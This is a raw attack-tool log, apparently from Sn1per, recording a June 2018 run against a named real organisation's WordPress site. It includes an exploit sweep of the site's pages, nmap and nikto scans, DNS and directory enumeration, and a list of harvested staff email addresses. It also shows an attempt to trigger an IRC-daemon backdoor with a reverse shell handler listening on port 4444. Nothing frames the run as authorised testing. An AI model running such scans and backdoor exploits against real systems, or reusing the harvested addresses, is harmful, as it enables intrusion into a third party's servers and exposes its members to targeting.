  1150. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1151. |_[ + ] More details::  / -  / , ISP:
  1152. |_[ + ] Found:: UNIDENTIFIED
  1153.  
  1154.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1155. |_[ + ] [ 39 / 54 ]-[07:55:59] [ - ]
  1156. |_[ + ] Target:: [ http://www.njoathkeepers.org/oath-keepers-president-responds-to-orlando-shooting/ ]
  1157. |_[ + ] Exploit::
  1158. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1159. |_[ + ] More details::  / -  / , ISP:
  1160. |_[ + ] Found:: UNIDENTIFIED
  1161.  
  1162.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1163. |_[ + ] [ 40 / 54 ]-[07:56:02] [ - ]
  1164. |_[ + ] Target:: [ http://www.njoathkeepers.org/event/america-first-rally-act-for-america/ ]
  1165. |_[ + ] Exploit::
  1166. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1167. |_[ + ] More details::  / -  / , ISP:
  1168. |_[ + ] Found:: UNIDENTIFIED
  1169.  
  1170.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1171. |_[ + ] [ 41 / 54 ]-[07:56:05] [ - ]
  1172. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/10th-annual-wounded-warrior-day/ ]
  1173. |_[ + ] Exploit::
  1174. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1175. |_[ + ] More details::  / -  / , ISP:
  1176. |_[ + ] Found:: UNIDENTIFIED
  1177.  
  1178.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1179. |_[ + ] [ 42 / 54 ]-[07:56:09] [ - ]
  1180. |_[ + ] Target:: [ http://www.njoathkeepers.org/event/honoring-unforgotten-heroes-ceremony-beirut-remembrance/ ]
  1181. |_[ + ] Exploit::
  1182. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1183. |_[ + ] More details::  / -  / , ISP:
  1184. |_[ + ] Found:: UNIDENTIFIED
  1185.  
  1186.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1187. |_[ + ] [ 43 / 54 ]-[07:56:12] [ - ]
  1188. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/west-milford-autumn-lights-festival/ ]
  1189. |_[ + ] Exploit::
  1190. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1191. |_[ + ] More details::  / -  / , ISP:
  1192. |_[ + ] Found:: UNIDENTIFIED
  1193.  
  1194.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1195. |_[ + ] [ 44 / 54 ]-[07:56:15] [ - ]
  1196. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/venues/bergen-county-veterans-memorial-monument/ ]
  1197. |_[ + ] Exploit::
  1198. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1199. |_[ + ] More details::  / -  / , ISP:
  1200. |_[ + ] Found:: UNIDENTIFIED
  1201.  
  1202.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1203. |_[ + ] [ 45 / 54 ]-[07:56:18] [ - ]
  1204. |_[ + ] Target:: [ http://www.njoathkeepers.org/event/mother-of-all-rallies-on-national-mall/ ]
  1205. |_[ + ] Exploit::
  1206. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1207. |_[ + ] More details::  / -  / , ISP:
  1208. |_[ + ] Found:: UNIDENTIFIED
  1209.  
  1210.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1211. |_[ + ] [ 46 / 54 ]-[07:56:20] [ - ]
  1212. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/west-milford-autumn-lights-festival-2/ ]
  1213. |_[ + ] Exploit::
  1214. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1215. |_[ + ] More details::  / -  / , ISP:
  1216. |_[ + ] Found:: UNIDENTIFIED
  1217.  
  1218.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1219. |_[ + ] [ 47 / 54 ]-[07:56:23] [ - ]
  1220. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/2018-military-appreciation-day-bergen-county/ ]
  1221. |_[ + ] Exploit::
  1222. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1223. |_[ + ] More details::  / -  / , ISP:
  1224. |_[ + ] Found:: UNIDENTIFIED
  1225.  
  1226.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1227. |_[ + ] [ 48 / 54 ]-[07:56:26] [ - ]
  1228. |_[ + ] Target:: [ http://www.njoathkeepers.org/event/3rd-annual-new-york-oath-keepers-award-dinner/ ]
  1229. |_[ + ] Exploit::
  1230. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1231. |_[ + ] More details::  / -  / , ISP:
  1232. |_[ + ] Found:: UNIDENTIFIED
  1233.  
  1234.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1235. |_[ + ] [ 49 / 54 ]-[07:56:29] [ - ]
  1236. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/second-annual-ny-oath-keepers-awards-dinner/ ]
  1237. |_[ + ] Exploit::
  1238. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1239. |_[ + ] More details::  / -  / , ISP:
  1240. |_[ + ] Found:: UNIDENTIFIED
  1241.  
  1242.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1243. |_[ + ] [ 50 / 54 ]-[07:56:32] [ - ]
  1244. |_[ + ] Target:: [ http://www.njoathkeepers.org/our-response-to-nj-office-of-homeland-security-and-preparedness/ ]
  1245. |_[ + ] Exploit::
  1246. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1247. |_[ + ] More details::  / -  / , ISP:
  1248. |_[ + ] Found:: UNIDENTIFIED
  1249.  
  1250.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1251. |_[ + ] [ 51 / 54 ]-[07:56:35] [ - ]
  1252. |_[ + ] Target:: [ http://www.njoathkeepers.org/stewart-rhodes-address-to-ny-oath-keepers-award-dinner/ ]
  1253. |_[ + ] Exploit::
  1254. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1255. |_[ + ] More details::  / -  / , ISP:
  1256. |_[ + ] Found:: UNIDENTIFIED
  1257.  
  1258.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1259. |_[ + ] [ 52 / 54 ]-[07:56:39] [ - ]
  1260. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/beirut-remembrance-oct-23rd-at-bergen-county-hall-of-heroes/ ]
  1261. |_[ + ] Exploit::
  1262. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1263. |_[ + ] More details::  / -  / , ISP:
  1264. |_[ + ] Found:: UNIDENTIFIED
  1265.  
  1266.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1267. |_[ + ] [ 53 / 54 ]-[07:56:42] [ - ]
  1268. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/westchester-county-chapter-of-oath-keepers-rally-to-stand-in-support-of-cliven-bundy/ ]
  1269. |_[ + ] Exploit::
  1270. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1271. |_[ + ] More details::  / -  / , ISP:
  1272. |_[ + ] Found:: UNIDENTIFIED
  1273.  
  1274. [ INFO ] [ Shutting down ]
  1275. [ INFO ] [ End of process INURLBR at [30-06-2018 07:56:42]
  1276. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1277. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-njoathkeepers.org.txt  ]
  1278. |_________________________________________________________________________________________
  1279.  
  1280. \_________________________________________________________________________________________/
  1281.  
  1282. Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-30 07:56 EDT
  1283. Nmap scan report for njoathkeepers.org (192.155.88.60)
  1284. Host is up (0.00086s latency).
  1285. rDNS record for 192.155.88.60: mail.nycpatriot.org
  1286.  
  1287. PORT     STATE    SERVICE VERSION
  1288. 6667/tcp filtered irc
  1289. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1290. Device type: firewall|general purpose
  1291. Running: Linux 2.4.X|2.6.X, ISS embedded
  1292. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  1293. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  1294.  
  1295. TRACEROUTE (using proto 1/icmp)
  1296. HOP RTT    ADDRESS
  1297. 1   ... 30
  1298.  
  1299. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1300. Nmap done: 1 IP address (1 host up) scanned in 11.94 seconds
  1301.  
  1302. Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
  1303. EFLAGS: 00010046
  1304. eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
  1305. esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
  1306. ds: 0018   es: 0018  ss: 0018
  1307. Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
  1308.  
  1309.  
  1310. RHOST => njoathkeepers.org
  1311. RHOSTS => njoathkeepers.org
  1312. [*] Started reverse TCP double handler on 10.211.1.21:4444
  1313. [*] njoathkeepers.org:6667 - Connected to njoathkeepers.org:6667...
  1314.     :mail.nycpatriot.org NOTICE * :BitlBee-IRCd initialized, please go on
  1315. [*] njoathkeepers.org:6667 - Sending backdoor command...
  1316. [*] Exploit completed, but no session was created.
  1317.  
  1318. #######################################################################################################################################
  1319. I, [2018-06-30T07:58:14.452995 #13599]  INFO -- : Initiating port scan
  1320. I, [2018-06-30T08:01:43.292429 #13599]  INFO -- : Using nmap scan output file logs/nmap_output_2018-06-30_07-58-14.xml
  1321. I, [2018-06-30T08:01:43.322757 #13599]  INFO -- : Discovered open port: 192.155.88.60:465
  1322. I, [2018-06-30T08:01:47.184682 #13599]  INFO -- : Discovered open port: 192.155.88.60:993
  1323. W, [2018-06-30T08:01:51.029183 #13599]  WARN -- : Yasuo did not find any potential hosts to enumerate
  1324. #######################################################################################################################################
  1325. Starting Nmap 7.01 ( https://nmap.org ) at 2018-06-30 11:41 UTC
  1326. Nmap scan report for njoathkeepers.org (192.155.88.60)
  1327. Host is up (0.0081s latency).
  1328. rDNS record for 192.155.88.60: mail.nycpatriot.org
  1329. PORT     STATE  SERVICE       VERSION
  1330. 21/tcp   closed ftp
  1331. 22/tcp   closed ssh
  1332. 23/tcp   closed telnet
  1333. 80/tcp   open   http          nginx 1.8.1
  1334. 110/tcp  closed pop3
  1335. 143/tcp  open   imap          Dovecot imapd
  1336. 443/tcp  closed https
  1337. 3389/tcp closed ms-wbt-server
  1338.  
  1339. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1340. Nmap done: 1 IP address (1 host up) scanned in 6.79 seconds
  1341.  
  1342. #######################################################################################################################################
  1343. Start: Sat Jun 30 11:44:26 2018
  1344. HOST: whatweb                Loss%   Snt   Last   Avg  Best  Wrst StDev
  1345.   1.|-- 45.55.64.254            0.0%     3    0.4   6.9   0.4  17.2   9.0
  1346.   2.|-- 138.197.251.22          0.0%     3    0.3   0.6   0.3   1.1   0.0
  1347.   3.|-- 138.197.244.32          0.0%     3    0.8   0.8   0.8   0.9   0.0
  1348.   4.|-- gw2.ewr1.us.linode.com  0.0%     3    2.0   1.9   1.8   2.0   0.0
  1349.   5.|-- 173.255.239.3           0.0%     3    2.2   2.1   2.1   2.2   0.0
  1350.   6.|-- mail.nycpatriot.org     0.0%     3    2.0   1.9   1.9   2.0   0.0
  1351.  
  1352. #######################################################################################################################################
  1353. [*] Performing General Enumeration of Domain: njoathkeepers.org
  1354. [-] DNSSEC is not configured for njoathkeepers.org
  1355. [*]      SOA fns1.dnspark.net 66.55.82.13
  1356. [*]      NS fns2.dnspark.net 192.184.90.32
  1357. [*]      Bind Version for 192.184.90.32 DNS
  1358. [*]      NS fns2.dnspark.net 2604:180:1::f02f:2c21
  1359. [*]      Bind Version for 2604:180:1::f02f:2c21 DNS
  1360. [*]      NS fns1.dnspark.net 66.55.82.13
  1361. [*]      NS fns1.dnspark.net 2001:1850:1:0:107::d
  1362. [*]      MX mail.yourhostingaccount.com 65.254.254.54
  1363. [*]      MX mail.yourhostingaccount.com 65.254.254.50
  1364. [*]      MX mail.yourhostingaccount.com 65.254.254.55
  1365. [*]      MX mail.yourhostingaccount.com 65.254.254.57
  1366. [*]      MX mail.yourhostingaccount.com 65.254.254.53
  1367. [*]      MX mail.yourhostingaccount.com 65.254.254.56
  1368. [*]      MX mail.yourhostingaccount.com 65.254.254.52
  1369. [*]      MX mail.yourhostingaccount.com 65.254.254.51
  1370. [*]      MX mail.yourhostingaccount.com 65.254.254.58
  1371. [*]      A njoathkeepers.org 192.155.88.60
  1372. [*]      TXT njoathkeepers.org v=spf1 include:servers.mcsv.net ?all
  1373. [*] Enumerating SRV Records
  1374. [-] No SRV Records Found for njoathkeepers.org
  1375. [+] 0 Records Found
  1376. #######################################################################################################################################
  1377. [*] Processing domain njoathkeepers.org
  1378. [+] Getting nameservers
  1379. 192.184.90.32 - fns2.dnspark.net
  1380. 66.55.82.13 - fns1.dnspark.net
  1381. [-] Zone transfer failed
  1382.  
  1383. [+] TXT records found
  1384. "v=spf1 include:servers.mcsv.net ?all"
  1385.  
  1386. [+] MX records found, added to target list
  1387. 0 mail.yourhostingaccount.com.
  1388.  
  1389. [*] Scanning njoathkeepers.org for A records
  1390. 192.155.88.60 - njoathkeepers.org                        
  1391. 192.155.88.60 - www.njoathkeepers.org          
  1392. #######################################################################################################################################
  1393. Ip Address  Status  Type    Domain Name         Server
  1394. ----------  ------  ----    -----------         ------
  1395. 192.155.88.60   200     host    www.njoathkeepers.org       nginx/1.8.1
  1396. #######################################################################################################################################
  1397. Original*      njoathkeepers.org      192.155.88.60 NS:fns1.dnspark.net MX:mail.yourhostingaccount.com
  1398. Subdomain      njoath.keepers.org     69.172.201.153 NS:ns1.uniregistrymarket.link
  1399. Subdomain      njoathkee.pers.org     185.53.178.6 NS:ns1.parkingcrew.net MX:mail.h-email.net
  1400. Subdomain      njoathkeeper.s.org     50.63.46.1 NS:A.SERVICE.AFILIASDNS.INFO
  1401. #######################################################################################################################################
  1402. --------------------------------------------------------------------------------------------------------------------------------------
  1403. + Target IP:          192.155.88.60
  1404. + Target Hostname:    njoathkeepers.org
  1405. + Target Port:        80
  1406. + Start Time:         2018-06-30 07:46:21 (GMT-4)
  1407. ---------------------------------------------------------------------------------------------------------------------------------------
  1408. + Server: nginx/1.8.1
  1409. + Retrieved x-powered-by header: PHP/5.5.38-1~dotdeb+7.1
  1410. + The anti-clickjacking X-Frame-Options header is not present.
  1411. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  1412. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  1413. + Root page / redirects to: http://www.njoathkeepers.org/
  1414. + No CGI Directories found (use '-C all' to force check all possible dirs)
  1415. + Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x59247b49 0x1d7
  1416. + "robots.txt" contains 13 entries which should be manually viewed.
  1417. + Uncommon header 'link' found, with contents: <http://www.njoathkeepers.org/wp-json/>; rel="https://api.w.org/"
  1418. + /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
  1419. + /wp-links-opml.php: This WordPress script reveals the installed version.
  1420. + OSVDB-3092: /license.txt: License file found may identify site software.
  1421. + Cookie wordpress_test_cookie created without the httponly flag
  1422. + Cookie PHPSESSID created without the httponly flag
  1423. + /wp-login.php: Wordpress login found
  1424. + 7460 requests: 1 error(s) and 13 item(s) reported on remote host
  1425. + End Time:           2018-06-30 08:58:34 (GMT-4) (4333 seconds)
  1426. ---------------------------------------------------------------------------------------------------------------------------------------
  1427. #######################################################################################################################################
  1428. ======================================================================================================================================
  1429. | [*] http://njoathkeepers.org/ redirected to http://www.njoathkeepers.org/
  1430. | [*] New target is: http://www.njoathkeepers.org/
  1431. =======================================================================================================================================
  1432. | Domain: http://www.njoathkeepers.org/
  1433. | Server: nginx/1.8.1
  1434. | IP: 192.155.88.60
  1435. =======================================================================================================================================
  1436. |
  1437. | Directory check:
  1438. | [+] CODE: 200 URL: http://www.njoathkeepers.org/Login/
  1439. | [+] CODE: 200 URL: http://www.njoathkeepers.org/about/
  1440. | [+] CODE: 200 URL: http://www.njoathkeepers.org/ad/
  1441. | [+] CODE: 200 URL: http://www.njoathkeepers.org/admin/
  1442. | [+] CODE: 200 URL: http://www.njoathkeepers.org/br/
  1443. | [+] CODE: 200 URL: http://www.njoathkeepers.org/ca/
  1444. | [+] CODE: 200 URL: http://www.njoathkeepers.org/calendar/
  1445. | [+] CODE: 200 URL: http://www.njoathkeepers.org/cal/
  1446. | [+] CODE: 200 URL: http://www.njoathkeepers.org/ed/
  1447. | [+] CODE: 200 URL: http://www.njoathkeepers.org/embed/
  1448. | [+] CODE: 200 URL: http://www.njoathkeepers.org/event/
  1449. | [+] CODE: 200 URL: http://www.njoathkeepers.org/feed/
  1450. | [+] CODE: 200 URL: http://www.njoathkeepers.org/for/
  1451. | [+] CODE: 200 URL: http://www.njoathkeepers.org/forgot/
  1452. | [+] CODE: 200 URL: http://www.njoathkeepers.org/fun/
  1453. | [+] CODE: 200 URL: http://www.njoathkeepers.org/go/
  1454. | [+] CODE: 200 URL: http://www.njoathkeepers.org/ja/
  1455. | [+] CODE: 200 URL: http://www.njoathkeepers.org/join/
  1456. | [+] CODE: 200 URL: http://www.njoathkeepers.org/login/
  1457. | [+] CODE: 200 URL: http://www.njoathkeepers.org/log/
  1458. | [+] CODE: 200 URL: http://www.njoathkeepers.org/mail/
  1459. | [+] CODE: 200 URL: http://www.njoathkeepers.org/mailing/
  1460. | [+] CODE: 200 URL: http://www.njoathkeepers.org/member/
  1461. | [+] CODE: 200 URL: http://www.njoathkeepers.org/members/
  1462. | [+] CODE: 200 URL: http://www.njoathkeepers.org/mem/
  1463. | [+] CODE: 200 URL: http://www.njoathkeepers.org/memb/
  1464. | [+] CODE: 200 URL: http://www.njoathkeepers.org/new/
  1465. | [+] CODE: 200 URL: http://www.njoathkeepers.org/pe/
  1466. | [+] CODE: 200 URL: http://www.njoathkeepers.org/press/
  1467. | [+] CODE: 200 URL: http://www.njoathkeepers.org/rss/
  1468. | [+] CODE: 200 URL: http://www.njoathkeepers.org/send/
  1469. | [+] CODE: 200 URL: http://www.njoathkeepers.org/som/
  1470. | [+] CODE: 200 URL: http://www.njoathkeepers.org/st/
  1471. | [+] CODE: 200 URL: http://www.njoathkeepers.org/supp/
  1472. | [+] CODE: 200 URL: http://www.njoathkeepers.org/support/
  1473. | [+] CODE: 200 URL: http://www.njoathkeepers.org/the/
  1474. | [+] CODE: 200 URL: http://www.njoathkeepers.org/wp-admin/
  1475. ===================================================================================================
  1476. |                                                                                                  
  1477. | File check:
  1478. | [+] CODE: 200 URL: http://www.njoathkeepers.org/admin/index.php
  1479. | [+] CODE: 200 URL: http://www.njoathkeepers.org/cgi-bin/calendar
  1480. | [+] CODE: 200 URL: http://www.njoathkeepers.org/cgi-bin/mail
  1481. | [+] CODE: 200 URL: http://www.njoathkeepers.org/favicon.ico
  1482. | [+] CODE: 200 URL: http://www.njoathkeepers.org/index.php
  1483. | [+] CODE: 200 URL: http://www.njoathkeepers.org/license.txt
  1484. | [+] CODE: 200 URL: http://www.njoathkeepers.org/readme.html
  1485. | [+] CODE: 200 URL: http://www.njoathkeepers.org/robots.txt
  1486. | [+] CODE: 200 URL: http://www.njoathkeepers.org/search/htx/sqlqhit.asp
  1487. | [+] CODE: 200 URL: http://www.njoathkeepers.org/search/htx/SQLQHit.asp
  1488. | [+] CODE: 200 URL: http://www.njoathkeepers.org/search/sqlqhit.asp
  1489. | [+] CODE: 200 URL: http://www.njoathkeepers.org/search/SQLQHit.asp
  1490. | [+] CODE: 200 URL: http://www.njoathkeepers.org/vgn/login
  1491. | [+] CODE: 200 URL: http://www.njoathkeepers.org/wp-content/plugins/akismet/readme.txt
  1492. ===================================================================================================
  1493. |
  1494. | Check robots.txt:
  1495. | [+] User-agent: *
  1496. | [+] Disallow: /calendar/action~posterboard/
  1497. | [+] Disallow: /calendar/action~agenda/
  1498. | [+] Disallow: /calendar/action~oneday/
  1499. | [+] Disallow: /calendar/action~month/
  1500. | [+] Disallow: /calendar/action~week/
  1501. | [+] Disallow: /calendar/action~stream/
  1502. | [+] Disallow: /calendar/action~undefined/
  1503. | [+] Disallow: /calendar/action~http:/
  1504. | [+] Disallow: /calendar/action~default/
  1505. | [+] Disallow: /calendar/action~poster/
  1506. | [+] Disallow: /calendar/action~*/
  1507. | [+] Disallow: /*controller=ai1ec_exporter_controller*
  1508. | [+] Disallow: /*/action~*/
  1509. |
  1510. | Check sitemap.xml:
  1511. #######################################################################################################################################
  1512. | E-mails:
  1513. | [+] E-mail Found: donations@americanbedrockfoundation.org
  1514. | [+] E-mail Found: ohn@newyorkoathkeeper.com
  1515. | [+] E-mail Found: kids@kidsguidenj.com
  1516. | [+] E-mail Found: stepman@njoathkeepers.org
  1517. | [+] E-mail Found: m@tidakada.com
  1518. | [+] E-mail Found: communications@njoathkeepers.org
  1519. | [+] E-mail Found: josephhakim@internationchristianunion.org
  1520. | [+] E-mail Found: regional-north@njoathkeepers.org
  1521. | [+] E-mail Found: secretary@njoathkeepers.org
  1522. | [+] E-mail Found: forum@njoathkeepers.org
  1523. | [+] E-mail Found: dwhite@actforamerica.org
  1524. | [+] E-mail Found: gloucester@njoathkeepers.org
  1525. | [+] E-mail Found: pio@njoathkeepers.org
  1526. | [+] E-mail Found: cpt@njoathkeepers.org
  1527. |
  1528. | External hosts:
  1529. | [+] External Host Found: https://codex.wordpress.org
  1530. | [+] External Host Found: https://www.mysql.com
  1531. | [+] External Host Found: https://developer.wordpress.org
  1532. | [+] External Host Found: http://irc.nycpatriot.org
  1533. | [+] External Host Found: http://njfirearms.com
  1534. | [+] External Host Found: https://wordpress.org
  1535. | [+] External Host Found: https://www.facebook.com
  1536. | [+] External Host Found: http://gmpg.org
  1537. | [+] External Host Found: http://oathkeepers.org
  1538. | [+] External Host Found: http://www.youtube.com
  1539. | [+] External Host Found: https://httpd.apache.org
  1540. | [+] External Host Found: https://www.paypal.com
  1541. | [+] External Host Found: http://www.philly.com
  1542. | [+] External Host Found: http://gotenna.com
  1543. | [+] External Host Found: http://maps.googleapis.com
  1544. | [+] External Host Found: http://www.meetup.com
  1545. | [+] External Host Found: https://www.google.com
  1546. | [+] External Host Found: https://planet.wordpress.org
  1547. | [+] External Host Found: http://www.somersetcounty4h.org
  1548. | [+] External Host Found: http://www.daveyspub.com
  1549. | [+] External Host Found: http://www.kidsguidenj.com
  1550. | [+] External Host Found: https://secure.php.net
  1551. | [+] External Host Found: http://www.actforamerica.org
  1552. | [+] External Host Found: http://eepurl.com
  1553. | [+] External Host Found: https://twitter.com
  1554. | [+] External Host Found: https://www.change.org
  1555. |
  1556. | PHPinfo() Disclosure:
  1557. |
  1558. | Timthumb:
  1559. |
  1560. | Ignored Files:
  1561. | http://www.njoathkeepers.org/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4
  1562. | http://www.njoathkeepers.org/wp-includes/css/buttons.min.css?ver=4.9.6
  1563. | http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.2
  1564. | http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/style.css?ver=4.9.6
  1565. | http://www.njoathkeepers.org/wp-admin/css/install.min.css?ver=4.9.6
  1566. | http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/widget/es-widget-page.js?ver=4.9.6
  1567. | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/css/normalize.min.css?ver=4.9.6
  1568. | http://www.njoathkeepers.org/wp-includes/js/wp-embed.min.js?ver=4.9.6
  1569. | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/css/forms.min.css?ver=4.9.6
  1570. | http://www.njoathkeepers.org/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4
  1571. | http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/widget/es-widget.css?ver=4.9.6
  1572. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/moment.min.js?ver=1
  1573. | http://www.njoathkeepers.org/wp-content/plugins/tablepress/js/jquery.datatables.min.js?ver=1.9
  1574. | http://www.njoathkeepers.org//www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex/css/ai1ec_parsed_css.css?ver=2.5.31
  1575. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/frontend.min.js?ver=3.7.2
  1576. | http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/css/style_login_widget.css?ver=4.9.6
  1577. | http://www.njoathkeepers.org/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=4.9.6
  1578. | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/js/jquery.validate.min.js?ver=1.13.1
  1579. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/maps/googlemaps-adapter.js?ver=3.7.2
  1580. | http://www.njoathkeepers.org/wp-content/uploads/2013/12/wbai-20131230.mp3
  1581. | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/css/style.min.css?ver=2.1
  1582. | http://www.njoathkeepers.org/wp-admin/css/ie.min.css?ver=4.9.6
  1583. | http://www.njoathkeepers.org/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=4.9.6
  1584. | http://www.njoathkeepers.org//ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/themes/smoothness/jquery-ui.css?ver=4.9.6
  1585. | http://www.njoathkeepers.org/wp-content/plugins/pta-member-directory/includes/css/pta-contact-form.css?ver=4.9.6
  1586. | http://www.njoathkeepers.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
  1587. | http://www.njoathkeepers.org/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=4.9.6
  1588. | http://www.njoathkeepers.org/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4
  1589. | http://www.njoathkeepers.org/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.6-78496d1
  1590. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/fullcalendar.min.js?ver=3.7.2
  1591. | http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/js/additional-methods.js?ver=4.9.6
  1592. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/css/fullcalendar.min.css?ver=3.7.2
  1593. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/qtip2.js?ver=3.7.2
  1594. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/js/event-manager.min.js?ver=3.7.2
  1595. | http://www.njoathkeepers.org/wp-admin/css/install.css?ver=20100228
  1596. | http://www.njoathkeepers.org/wp-content/plugins/taskfreak/css/front.css?ver=4.9.6
  1597. | http://www.njoathkeepers.org/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1
  1598. | http://www.njoathkeepers.org/wp-content/plugins/awesome-surveys/js/script.min.js?ver=2.1
  1599. | http://www.njoathkeepers.org/wp-includes/js/jquery/ui/button.min.js?ver=1.11.4
  1600. | http://www.njoathkeepers.org/wp-content/tablepress-combined.min.css?ver=38
  1601. | http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.2
  1602. | http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/js/jquery.validate.min.js?ver=4.9.6
  1603. | http://www.njoathkeepers.org/wp-content/uploads/2013/12/wbai-20131230.mp3?_=1
  1604. | http://www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/public/js_cache/calendar.js?ver=2.5.31
  1605. | http://www.njoathkeepers.org/wp-includes/wlwmanifest.xml
  1606. | http://www.njoathkeepers.org/wp-content/plugins/taskfreak/js/front.js?ver=4.9.6
